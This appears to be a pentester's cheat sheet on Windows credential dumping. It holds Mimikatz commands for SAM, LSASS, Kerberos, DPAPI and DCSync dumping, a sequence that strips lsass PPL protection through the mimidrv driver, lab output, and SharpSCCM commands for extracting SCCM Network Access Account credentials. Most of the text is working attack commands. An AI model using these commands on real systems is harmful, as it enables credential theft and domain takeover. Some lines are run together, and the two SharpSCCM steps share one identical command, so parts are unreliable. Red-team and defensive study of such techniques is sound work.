Credential dumping
LaZagne
TODO
Mimikatz
| Command | Privileges | Description |
|---|---|---|
lsadump::sam | Admin | Dump credentials from the Security Account Manager |
lsadump::cache | Admin | Dump domain cached credentials. These can be cracked offline to extract the password. |
lsadump::dcsync | Domain Admin | Perform a DC-Sync attack |
sekurlsa::logonpasswords | Admin | Dump NTLM hashes and plaintext passwords from memory |
sekurlsa::ekeys | Admin | Dump Kerberos encryption keys of currently logged on users (often more useful, as Windows services typically use Kerberos instead of NTLM) |
crypto::certificates /export | User / Admin | Dump user certificates to disk. Password will be mimikatz. If you have admin rights, supply /systemstore:local_machine to dump computer certificates. |
mimikatz sekurlsa::dpapi | Local Admin | If the keys are stored in LSASS, dump them using this command |
mimikatz dpapi::masterkey /in:%appdata%\\Microsoft\\Protect\\GUID /rpc | User | Requests the user credentials using RPC from the DC (requires impersonation). |
ts::multirdp | Admin | Requires privilege::debug beforehand. Enable RDP access for two users. https://tools.thehacker.recipes/mimikatz/modules/ts/multirdp |
Trust dumping docs: https://tools.thehacker.recipes/mimikatz/modules/lsadump/trust
DCsync
powershell
Using 'a.dcsync' for logfile : OK
mimikatz # lsadump::dcsync /csv /all
[DC] 'lab.local' will be the domain
[DC] 'DC1.lab.local' will be the DC serverBypass PPL protection
powershell
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # sekurlsa::After extraction, restore the configuration:
powershell
mimikatz # !processprotect /process:lsass.exe /add
Process : lsass.exe
PID 680 -> 3f/3f [2-0-6]
mimikatz # !-
[+] 'mimidrv' service stopped
[+] 'mimidrv' service removedMimikatz cheatsheet: Mimikatz cheat sheet
SharpSCCM
Network Access Account credentials
In case you have computers which are not joined to a domain but still connect to SCCM, you may be able to find the used credentials in SCCM policy artifacts and dump/decrypt them using SharpSCCM.
Requirements:
- Machine with access to SCCM
- Privileged account on that machine
powershell
# Dump Network Access Account credentials
SharpSCCM.exe local naa -m wmi --no-banner
# Ask SCCM for the policy containing the credentials
SharpSCCM.exe local naa -m wmi --no-bannerBy default, these credentials should only have read access to the SDP. However, they are often over-permissive and sometimes even have domain admin rights.
The original notes referenced additional internal sections (e.g. "User impersonation / Make token") which are not part of this export.